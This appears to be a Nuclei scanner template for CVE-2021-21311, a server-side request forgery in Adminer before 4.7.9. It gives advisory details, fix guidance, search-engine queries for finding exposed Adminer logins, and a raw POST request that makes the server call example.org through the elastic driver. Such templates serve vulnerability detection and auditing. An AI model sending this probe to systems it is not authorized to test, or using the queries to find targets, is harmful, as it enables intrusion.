78 lines
2.8 KiB
YAML
78 lines
2.8 KiB
YAML
id: CVE-2021-21311
|
|
|
|
info:
|
|
name: Adminer <4.7.9 - Server-Side Request Forgery
|
|
author: Adam Crosser,pwnhxl
|
|
severity: high
|
|
description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could lead to unauthorized access to internal resources and potential data leakage.
|
|
remediation: Upgrade to version 4.7.9 or later.
|
|
reference:
|
|
- https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
|
|
- https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
|
|
- https://packagist.org/packages/vrana/adminer
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-21311
|
|
- https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2021-21311
|
|
cwe-id: CWE-918
|
|
epss-score: 0.02092
|
|
epss-percentile: 0.89083
|
|
cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 6
|
|
vendor: adminer
|
|
product: adminer
|
|
shodan-query:
|
|
- title:"Login - Adminer"
|
|
- cpe:"cpe:2.3:a:adminer:adminer"
|
|
- http.title:"login - adminer"
|
|
fofa-query:
|
|
- app="Adminer" && body="4.7.8"
|
|
- title="login - adminer"
|
|
- app="adminer" && body="4.7.8"
|
|
google-query: intitle:"login - adminer"
|
|
hunter-query:
|
|
- app.name="Adminer"&&web.body="4.7.8"
|
|
- app.name="adminer"&&web.body="4.7.8"
|
|
tags: cve2021,cve,adminer,ssrf
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST {{path}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}
|
|
|
|
payloads:
|
|
path:
|
|
- "/index.php"
|
|
- "/adminer.php"
|
|
- "/adminer/adminer.php"
|
|
- "/adminer/index.php"
|
|
- "/_adminer.php"
|
|
- "/_adminer/index.php"
|
|
|
|
attack: batteringram
|
|
stop-at-first-match: true
|
|
redirects: true
|
|
max-redirects: 1
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<title>400 - Bad Request</title>"
|
|
- "<title>400 - Bad Request</title>"
|
|
condition: or
|
|
|
|
- type: status
|
|
status:
|
|
- 403
|
|
# digest: 490a0046304402203bfc7390e904463da3e9e24581c8502ef069540ea7730e15869bcb95630c8519022015b5d7c34b7610cf88d38904246e75218e539c437bb4f86f93301f51843ff291:922c64590222798bb761d5b6d8e72950 |